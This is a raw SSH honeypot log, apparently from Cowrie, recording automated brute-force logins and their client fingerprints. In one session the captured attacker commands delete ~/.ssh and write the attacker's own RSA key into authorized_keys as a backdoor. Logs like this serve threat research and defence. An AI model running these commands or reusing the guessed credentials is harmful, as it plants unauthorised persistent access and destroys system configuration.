{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T17:44:41.247863Z","src_ip":"212.227.125.160","session":"8fb1b67e5c38"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T17:44:45.062604Z","src_ip":"212.227.125.160","session":"8fb1b67e5c38"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:44:46.310042Z","src_ip":"212.227.125.160","session":"8fb1b67e5c38"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.253.95","src_port":49868,"dst_ip":"1.2.3.4","dst_port":22,"session":"5d9ec37bb858","protocol":"ssh","message":"New connection: 199.195.253.95:49868 (1.2.3.4:22) [session: 5d9ec37bb858]","sensor":"my-vps","timestamp":"2025-08-28T17:44:52.563644Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T17:44:52.571578Z","src_ip":"199.195.253.95","session":"5d9ec37bb858"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T17:44:52.733226Z","src_ip":"199.195.253.95","session":"5d9ec37bb858"}
{"eventid":"cowrie.login.success","username":"root","password":"aa123456#","message":"login attempt [root/aa123456#] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:44:53.275129Z","src_ip":"199.195.253.95","session":"5d9ec37bb858"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T17:44:53.629559Z","src_ip":"199.195.253.95","session":"5d9ec37bb858"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T17:44:53.630239Z","src_ip":"199.195.253.95","session":"5d9ec37bb858"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T17:44:53.631020Z","src_ip":"199.195.253.95","session":"5d9ec37bb858"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:44:53.816124Z","src_ip":"199.195.253.95","session":"5d9ec37bb858"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T17:44:54.633626Z","src_ip":"199.195.253.95","session":"5d9ec37bb858"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T17:44:54.634302Z","src_ip":"199.195.253.95","session":"5d9ec37bb858"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T17:44:54.866290Z","src_ip":"199.195.253.95","session":"5d9ec37bb858"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:44:54.867221Z","src_ip":"199.195.253.95","session":"5d9ec37bb858"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.253.95","src_port":50884,"dst_ip":"1.2.3.4","dst_port":22,"session":"3391c4fbc5e4","protocol":"ssh","message":"New connection: 199.195.253.95:50884 (1.2.3.4:22) [session: 3391c4fbc5e4]","sensor":"my-vps","timestamp":"2025-08-28T17:44:55.080370Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T17:44:55.096275Z","src_ip":"199.195.253.95","session":"3391c4fbc5e4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T17:44:55.345780Z","src_ip":"199.195.253.95","session":"3391c4fbc5e4"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T17:44:56.190266Z","src_ip":"199.195.253.95","session":"3391c4fbc5e4"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:44:57.318039Z","src_ip":"199.195.253.95","session":"3391c4fbc5e4"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.253.95","src_port":51690,"dst_ip":"1.2.3.4","dst_port":22,"session":"c76bce1a557a","protocol":"ssh","message":"New connection: 199.195.253.95:51690 (1.2.3.4:22) [session: c76bce1a557a]","sensor":"my-vps","timestamp":"2025-08-28T17:44:57.424048Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T17:44:57.432511Z","src_ip":"199.195.253.95","session":"c76bce1a557a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T17:44:57.536226Z","src_ip":"199.195.253.95","session":"c76bce1a557a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:44:58.030901Z","src_ip":"199.195.253.95","session":"c76bce1a557a"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:44:58.139454Z","src_ip":"199.195.253.95","session":"c76bce1a557a"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:44:58.140365Z","src_ip":"199.195.253.95","session":"5d9ec37bb858"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":11013,"dst_ip":"1.2.3.4","dst_port":22,"session":"e209cbf2c828","protocol":"ssh","message":"New connection: 80.94.95.15:11013 (1.2.3.4:22) [session: e209cbf2c828]","sensor":"my-vps","timestamp":"2025-08-28T17:44:58.882023Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T17:44:58.882734Z","src_ip":"80.94.95.15","session":"e209cbf2c828"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T17:44:58.935827Z","src_ip":"80.94.95.15","session":"e209cbf2c828"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T17:44:59.300523Z","src_ip":"80.94.95.15","session":"e209cbf2c828"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:45:00.354888Z","src_ip":"80.94.95.15","session":"e209cbf2c828"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.150.220","src_port":34048,"dst_ip":"1.2.3.4","dst_port":22,"session":"795ef4071493","protocol":"ssh","message":"New connection: 171.243.150.220:34048 (1.2.3.4:22) [session: 795ef4071493]","sensor":"my-vps","timestamp":"2025-08-28T17:45:01.678985Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T17:45:01.680373Z","src_ip":"171.243.150.220","session":"795ef4071493"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T17:45:01.898106Z","src_ip":"171.243.150.220","session":"795ef4071493"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T17:45:04.056964Z","src_ip":"171.243.150.220","session":"795ef4071493"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:45:05.283727Z","src_ip":"171.243.150.220","session":"795ef4071493"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50138,"dst_ip":"1.2.3.4","dst_port":22,"session":"ecc73a82f687","protocol":"ssh","message":"New connection: 212.227.235.229:50138 (1.2.3.4:22) [session: ecc73a82f687]","sensor":"my-vps","timestamp":"2025-08-28T17:45:15.629117Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:45:15.630125Z","src_ip":"212.227.235.229","session":"ecc73a82f687"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-28T17:45:15.729816Z","src_ip":"212.227.235.229","session":"ecc73a82f687"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"0b:1d:a8:88:46:1a:a4:61:da:b2:3c:c0:2a:09:71:46","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCu6098r892+Qm1/Fi6D4BMjV487b+uGpnH4TnZp7Qr7NYQuxs7jiOPod32rBSTcfx2eXUcrOFVZSKZ6wMJtEKz9bRj2WxLZuMPJxi96mFHNbr7FE9QyxCAVqtu8aK6/8ZgLARp9m1KrK0U1yzJf/GqpVNF3RrnD7g0VDbcv9efCvhLXoGuM2wGGSB1GuOMrnqhdYyImCOTsXGm5CDIyiJvuPLDUVyhajYcewY51T6RukbjTv2DIb7b++hyyZTcGqZ9uWMoJpZuNuq8K+TIPHd7TF0EWJhhTt1a8dyOXXp147GN1RDT+nZRXQ+Ld+MjE5nGPILLcVsAGmT9Pw8UlI2b","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 0b:1d:a8:88:46:1a:a4:61:da:b2:3c:c0:2a:09:71:46","sensor":"my-vps","timestamp":"2025-08-28T17:45:15.929679Z","src_ip":"212.227.235.229","session":"ecc73a82f687"}
